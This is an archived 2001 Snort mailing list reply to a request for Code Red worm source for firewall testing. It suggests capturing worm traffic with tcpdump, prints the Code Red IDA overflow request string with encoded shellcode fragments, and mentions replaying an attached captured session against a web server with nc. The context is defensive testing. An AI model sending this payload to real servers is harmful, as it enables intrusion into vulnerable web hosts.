Snort mailing list archives

Re: Where to get " code red worm source" ?

From: Phil Wood <cpw () lanl gov>
Date: Wed, 29 Aug 2001 11:50:49 -0600

On Wed, Aug 29, 2001 at 01:44:33PM +0900, ls1100 wrote:


I'd like to testing own my linux firewalls using iptables aganist Code-Red-worm

Anybody know, Where to get  " code red worm source" ?


What I do is just run:

  tcpdump -s 1518 -w codeRed -c 100 dst net mynet and dst port 80

In less than a second, I have 5 examples.  Each one has the following
"string" among other things:

GET 
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
  HTTP/1.0

Since 8/13 we have had rougly 25+ million codereds.  Today (last 11 hours and
39 minutes) we have had 878,589.

I just don't see how you could miss getting one for yourself. %^)

I extracted one of the "sessions" in binary which you could pipe to a web
server using nc.




-- 
Phil Wood, cpw () lanl gov

Attachment: cr.bin
Description:

Current thread:

Where to get " code red worm source" ? ls1100 (Aug 28)
- Re: Where to get " code red worm source" ? Phil Wood (Aug 29)
  - Re: Where to get " code red worm source" ? Daniel Monjar (Aug 29)
    - Re: Where to get " code red worm source" ? Phil Wood (Aug 29)
- <Possible follow-ups>
- FW: Where to get " code red worm source" ? Martin O'Reilly (Aug 29)
- RE: Where to get " code red worm source" ? Mel Chandler PMI (Aug 30)
  - Re: Where to get " code red worm source" ? Olaf Schreck (Aug 30)
- Re: Where to get " code red worm source" ? Phil Wood (Aug 30)
  - Re: Where to get " code red worm source" ? Ryan Russell (Aug 30)
  - Message not available
    - Re: hi ^^ I have question ^^ Phil Wood (Aug 31)